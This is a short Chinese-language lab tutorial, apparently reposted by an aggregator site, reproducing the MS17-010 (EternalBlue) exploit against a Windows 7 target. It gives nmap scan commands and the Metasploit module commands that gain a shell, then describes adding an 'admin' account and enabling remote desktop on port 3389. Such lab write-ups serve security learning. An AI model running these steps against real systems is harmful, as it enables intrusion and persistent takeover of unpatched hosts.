MS17010(永恒之蓝)漏洞复现

Posted 『铁躯电芯』

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MS17010(永恒之蓝)漏洞复现相关的知识,希望对你有一定的参考价值。

MS17010(永恒之蓝)漏洞利用与复现

首先需要准备win7的环境做为靶机

获取信息

利用nmap扫描得到,靶机IP

nmap -sP 192.168.229.0/24

得到:
IP:192.168.229.169

然后利用:

nmap --script=vuln 192.168.229.169

得到靶机信息:

发现可能利用的漏洞:
ms17-010

然后启动msf

msfconsole

然后查找漏洞路径:

search ms17-010


使用payload进行攻击:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.229.169
run


然后输入:shell

然后在查看当前用户:

net user


发现用乱码可以用这个取消乱码:

chcp 65001

然后添加一个admin用户密码也为admin

然后开启3389端口:

然后在开启远程控制:

得到:

以上是关于MS17010(永恒之蓝)漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

永恒之蓝漏洞补丁-MS17010补丁列表KB号

永恒之蓝漏洞补丁-MS17010补丁列表KB号

永恒之蓝 MS17-010漏洞复现

永恒之蓝MS17-010漏洞复现

MS17-010(永恒之蓝)漏洞复现和分析

ms17-010永恒之蓝病毒复现